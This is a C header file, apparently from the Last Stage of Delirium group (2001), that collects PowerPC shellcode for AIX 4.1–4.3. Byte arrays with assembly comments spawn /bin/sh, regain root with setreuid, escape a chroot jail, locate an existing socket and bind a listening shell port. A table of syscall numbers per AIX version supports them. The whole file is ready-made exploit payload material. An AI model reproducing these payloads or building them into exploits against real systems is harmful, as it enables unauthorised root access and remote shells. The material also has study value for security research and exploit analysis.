/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for aix 4.1 4.2 4.3 power/powerpc                              #*/

/*
syscall     %r2  %r2  %r2  %r3,%r4,%r5
----------- ---- ---- ---- -----------------------------------------------------
execve      x003 x002 x004 ->path="/bin/sh",->[->a0=path,0],0
execve      x003 x002 x004 ->path="/bin/sh",->[->a0=path,->a1="-c",->a2=cmd,0],0
seteuid     x068 x071 x082 euid=0
mkdir       x07f x08e x0a0 ->path="t..",mode= (each value is valid)
chroot      x06f x078 x089 ->path={"t..","."}
chdir       x06d x076 x087 ->path=".."
getpeername x041 x046 x053 sfd,->sadr=[],->[len=0x2c]
socket      x057 x05b x069 AF_INET=2,SOCK_STREAM=1,prot=0
bind        x056 x05a x068 sfd,->sadr=[0x2c,0x02,hi,lo,0,0,0,0],len=0x10
listen      x055 x059 x067 sfd,backlog=5
accept      x053 x058 x065 sfd,0,0
close       x05e x062 x071 fd={0,1,2}
kfcntl      x0d6 x0e7 x0fc sfd,F_DUPFD=0,fd={0,1,2}
            v4.1 v4.2 v4.3 
*/

#if defined(POWERPC) && defined(AIX)

char _shellcode[]=         /* 12*4+8 bytes                 */
    "\x7c\xa5\x2a\x79"     /* xor.    r5,r5,r5             */
    "\x40\x82\xff\xfd"     /* bnel    <shellcode>          */
    "\x7f\xe8\x02\xa6"     /* mflr    r31                  */
    "\x3b\xff\x01\x20"     /* cal     r31,0x120(r31)       */
    "\x38\x7f\xff\x08"     /* cal     r3,-248(r31)         */
    "\x38\x9f\xff\x10"     /* cal     r4,-240(r31)         */
    "\x90\x7f\xff\x10"     /* st      r3,-240(r31)         */
    "\x90\xbf\xff\x14"     /* st      r5,-236(r31)         */
    "\x88\x5f\xff\x0f"     /* lbz     r2,-241(r31)         */
    "\x98\xbf\xff\x0f"     /* stb     r5,-241(r31)         */
    "\x4c\xc6\x33\x42"     /* crorc   cr6,cr6,cr6          */
    "\x44\xff\xff\x02"     /* svca                         */
    "/bin/sh"
#ifdef V41
    "\x03"
#endif
#ifdef V42
    "\x02"
#endif
#ifdef V43
    "\x04"
#endif
;

char _setreuidshellcode[]= /* 19*4+7 bytes                   */
    "\x7e\x94\xa2\x79"     /* xor.    r20,r20,r20            */
    "\x40\x82\xff\xfd"     /* bnel    (setreuidcode)         */
    "\x7e\xa8\x02\xa6"     /* mflr    r21                    */ 
    "\x3a\xb5\x01\x40"     /* cal     r21,0x140(r21)         */
    "\x88\x55\xfe\xe0"     /* lbz     r2,-288(r21)           */
    "\x7e\x83\xa3\x78"     /* mr      r3,r20                 */
    "\x3a\xd5\xfe\xe4"     /* cal     r22,-284(r21)          */
    "\x7e\xc8\x03\xa6"     /* mtlr    r22                    */
    "\x4c\xc6\x33\x42"     /* crorc   cr6,cr6,cr6            */
    "\x44\xff\xff\x02"     /* svca                           */
#ifdef V41
    "\x68\x03\xff\xff"      
#endif
#ifdef V42
    "\x71\x02\xff\xff"      
#endif
#ifdef V43
    "\x82\x04\xff\xff"      
#endif
    "\x38\x75\xff\x04"     /* cal     r3,-252(r21)           */
    "\x38\x95\xff\x0c"     /* cal     r4,-244(r21)           */
    "\x7e\x85\xa3\x78"     /* mr      r5,r20                 */
    "\x90\x75\xff\x0c"     /* st      r3,-244(r21)           */
    "\x92\x95\xff\x10"     /* st      r20,-240(r21)          */ 
    "\x88\x55\xfe\xe1"     /* lbz     r2,-287(r21)           */
    "\x9a\x95\xff\x0b"     /* stb     r20,-245(r21)          */
    "\x4b\xff\xff\xd8"     /* bl      (setreuidcode+32)      */
    "/bin/sh"
;

char syscallcode[]=        /* 14*4 bytes                     */
    "\x7e\x94\xa2\x79"     /* xor.    r20,r20,r20            */
    "\x40\x82\xff\xfd"     /* bnel    <syscallcode>          */
    "\x7e\xa8\x02\xa6"     /* mflr    r21                    */
    "\x3a\xc0\x01\xff"     /* lil     r22,0x1ff              */
    "\x3a\xf6\xfe\x2d"     /* cal     r23,-467(r22)          */
    "\x7e\xb5\xba\x14"     /* cax     r21,r21,r23            */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x20"     /* bctr                           */
#ifdef V41
    "\x03\x68\x41\x5e"
    "\x6d\x7f\x6f\xd6"
    "\x57\x56\x55\x53"
#endif
#ifdef V42
    "\x02\x71\x46\x62"
    "\x76\x8e\x78\xe7"
    "\x5b\x5a\x59\x58"
#endif
#ifdef V43
    "\x04\x82\x53\x71"
    "\x87\xa0\x89\xfc"
    "\x69\x68\x67\x65"
#endif
    "\x4c\xc6\x33\x42"     /* crorc   cr6,cr6,cr6            */
    "\x44\xff\xff\x02"     /* svca    0x0                    */
    "\x3a\xb5\xff\xf8"     /* cal     r21,-8(r21)            */
;

char shellcode[]=          /* 12*4+7 bytes                   */
    "\x7c\xa5\x2a\x79"     /* xor.    r5,r5,r5               */
    "\x40\x82\xff\xfd"     /* bnel    <shellcode>            */
    "\x7f\xe8\x02\xa6"     /* mflr    r31                    */
    "\x3b\xff\x01\x20"     /* cal     r31,0x120(r31)         */
    "\x38\x7f\xff\x08"     /* cal     r3,-248(r31)           */
    "\x38\x9f\xff\x10"     /* cal     r4,-240(r31)           */
    "\x90\x7f\xff\x10"     /* st      r3,-240(r31)           */
    "\x90\xbf\xff\x14"     /* st      r5,-236(r31)           */
    "\x88\x55\xff\xf4"     /* lbz     r2,-12(r21)            */
    "\x98\xbf\xff\x0f"     /* stb     r5,-241(r31)           */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x20"     /* bctr                           */
    "/bin/sh"
;

char cmdshellcode[]=       /* 17*4+12+cmdlen bytes           */
    "\x7c\xa5\x2a\x79"     /* xor.    r5,r5,r5               */
    "\x40\x82\xff\xfd"     /* bnel    <cmdshellcode>         */
    "\x7f\xe8\x02\xa6"     /* mflr    r31                    */
    "\x3b\xff\x01\x2c"     /* cal     r31,0x12c(r31)         */
    "\x38\x7f\xff\x10"     /* cal     r3,-240(r31)           */
    "\x38\x9f\xfe\xc8"     /* cal     r4,-312(r31)           */
    "\x38\xdf\xff\x18"     /* cal     r6,-232(r31)           */
    "\x38\xff\xff\x1c"     /* cal     r7,-228(r31)           */
    "\x90\x7f\xfe\xc8"     /* st      r3,-312(r31)           */
    "\x90\xdf\xfe\xcc"     /* st      r6,-308(r31)           */
    "\x90\xff\xfe\xd0"     /* st      r7,-304(r31)           */
    "\x90\xbf\xfe\xd4"     /* st      r5,-300(r31)           */
    "\x98\xbf\xff\x17"     /* stb     r5,-233(r31)           */
    "\x98\xbf\xff\x1a"     /* stb     r5,-230(r31)           */
    "\x88\x55\xff\xf4"     /* lbz     r2,-12(r21)            */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x20"     /* bctr                           */
    "/bin/sh -c  "
    /* command */
;

char setreuidcode[]=       /* 4*4 bytes                      */
    "\x88\x55\xff\xf5"     /* lbz     r2,-11(r21)            */
    "\x7e\x83\xa3\x78"     /* mr      r3,r20                 */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
;

char chrootcode[]=         /* 23*4 bytes                     */
    "\x2c\x74\x2e\x2e"     /* cmpi     cr0,r20,0x2e2e        */
    "\x41\x82\xff\xfd"     /* beql     <chrootcode>          */
    "\x7f\x08\x02\xa6"     /* mflr     r24                   */
    "\x92\x98\xff\xfc"     /* st       r20,-4(r24)           */
    "\x38\x78\xff\xf9"     /* cal      r3,-7(r24)            */
    "\x88\x55\xff\xf9"     /* lbz      r2,-7(r21)            */
    "\x7e\xa9\x03\xa6"     /* mtctr    r21                   */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x38\x78\xff\xf9"     /* cal      r3,-7(r24)            */
    "\x88\x55\xff\xfa"     /* lbz      r2,-6(r21)            */
    "\x7e\xa9\x03\xa6"     /* mtctr    r21                   */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x3b\x20\x01\x01"     /* lil      r25,0x101             */
    "\x38\x78\xff\xfa"     /* cal      r3,-6(r24)            */
    "\x88\x55\xff\xf8"     /* lbz      r2,-8(r21)            */
    "\x7e\xa9\x03\xa6"     /* mtctr    r21                   */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x37\x39\xff\xff"     /* ai.      r25,r25,-1            */
    "\x40\x82\xff\xec"     /* bne      <chrootcode+52>       */
    "\x38\x78\xff\xfb"     /* cal      r3,-5(r24)            */
    "\x88\x55\xff\xfa"     /* lbz      r2,-6(r21)            */
    "\x7e\xa9\x03\xa6"     /* mtctr    r21                   */
    "\x4e\x80\x04\x21"     /* bctrl                          */
;

char findsckcode[]=        /* 38*4 bytes                     */
    "\x2c\x74\x12\x34"     /* cmpi    cr0,r20,0x1234         */
    "\x41\x82\xff\xfd"     /* beql    <findsckcode>          */
    "\x7f\x08\x02\xa6"     /* mflr    r24                    */
    "\x3b\x36\xfe\x2d"     /* cal     r25,-467(r22)          */
    "\x3b\x40\x01\x01"     /* lil     r26,0x16               */
    "\x7f\x78\xca\x14"     /* cax     r27,r24,r25            */
    "\x7f\x69\x03\xa6"     /* mtctr   r27                    */
    "\x4e\x80\x04\x20"     /* bctr                           */
    "\xa3\x78\xff\xfe"     /* lhz     r27,-2(r24)            */
    "\xa3\x98\xff\xfa"     /* lhz     r28,-6(r24)            */
    "\x7c\x1b\xe0\x40"     /* cmpl    cr0,r27,r28            */
    "\x3b\x36\xfe\x59"     /* cal     r25,-423(r22)          */
    "\x41\x82\xff\xe4"     /* beq     <findsckcode+20>       */
    "\x7f\x43\xd3\x78"     /* mr      r3,r26                 */
    "\x38\x98\xff\xfc"     /* cal     r4,-4(r24)             */
    "\x38\xb8\xff\xf4"     /* cal     r5,-12(r24)            */
    "\x93\x38\xff\xf4"     /* st      r25,-12(r24)           */
    "\x88\x55\xff\xf6"     /* lbz     r2,-10(r21)            */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x37\x5a\xff\xff"     /* ai.     r26,r26,-1             */
    "\x2d\x03\xff\xff"     /* cmpi    cr2,r3,-1              */
    "\x40\x8a\xff\xc8"     /* bne     cr2,<findsckcode+32>   */
    "\x40\x82\xff\xd8"     /* bne     <findsckcode+48>       */
    "\x3b\x36\xfe\x03"     /* cal     r25,-509(r22)          */
    "\x3b\x76\xfe\x02"     /* cal     r27,-510(r22)          */
    "\x7f\x23\xcb\x78"     /* mr      r3,r25                 */
    "\x88\x55\xff\xf7"     /* lbz     r2,-9(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7c\x7a\xda\x14"     /* cax     r3,r26,r27             */
    "\x7e\x84\xa3\x78"     /* mr      r4,r20                 */
    "\x7f\x25\xcb\x78"     /* mr      r5,r25                 */
    "\x88\x55\xff\xfb"     /* lbz     r2,-5(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x37\x39\xff\xff"     /* ai.     r25,r25,-1             */
    "\x40\x80\xff\xd4"     /* bge     <findsckcode+100>      */
;

char bindsckcode[]=        /* 42*4 bytes                     */
    "\x2c\x74\x12\x34"     /* cmpi    cr0,r20,0x1234         */
    "\x41\x82\xff\xfd"     /* beql    <bindsckcode>          */
    "\x7f\x08\x02\xa6"     /* mflr    r24                    */
    "\x92\x98\xff\xfc"     /* st      r20,-4(r24)            */
    "\x38\x76\xfe\x03"     /* cal     r3,-509(r22)           */
    "\x38\x96\xfe\x02"     /* cal     r4,-510(r22)           */
    "\x98\x78\xff\xf9"     /* stb     r3,-7(r24)             */
    "\x7e\x85\xa3\x78"     /* mr      r5,r20                 */
    "\x88\x55\xff\xfc"     /* lbz     r2,-4(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7c\x79\x1b\x78"     /* mr      r25,r3                 */
    "\x38\x98\xff\xf8"     /* cal     r4,-8(r24)             */
    "\x38\xb6\xfe\x11"     /* cal     r5,-495(r22)           */
    "\x88\x55\xff\xfd"     /* lbz     r2,-3(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7f\x23\xcb\x78"     /* mr      r3,r25                 */
    "\x38\x96\xfe\x06"     /* cal     r4,-506(r22)           */
    "\x88\x55\xff\xfe"     /* lbz     r2,-2(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7f\x23\xcb\x78"     /* mr      r3,r25                 */
    "\x7e\x84\xa3\x78"     /* mr      r4,r20                 */
    "\x7e\x85\xa3\x78"     /* mr      r5,r20                 */
    "\x88\x55\xff\xff"     /* lbz     r2,-1(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7c\x79\x1b\x78"     /* mr      r25,r3                 */
    "\x3b\x56\xfe\x03"     /* cal     r26,-509(r22)          */
    "\x7f\x43\xd3\x78"     /* mr      r3,r26                 */
    "\x88\x55\xff\xf7"     /* lbz     r2,-9(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7f\x23\xcb\x78"     /* mr      r3,r25                 */
    "\x7e\x84\xa3\x78"     /* mr      r4,r20                 */
    "\x7f\x45\xd3\x78"     /* mr      r5,r26                 */
    "\x88\x55\xff\xfb"     /* lbz     r2,-5(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x37\x5a\xff\xff"     /* ai.     r26,r26,-1             */
    "\x40\x80\xff\xd4"     /* bge     <bindsckcode+120>      */
;

#define FINDSCKPORTOFS     2
#define BINDSCKPORTOFS     2

#endif
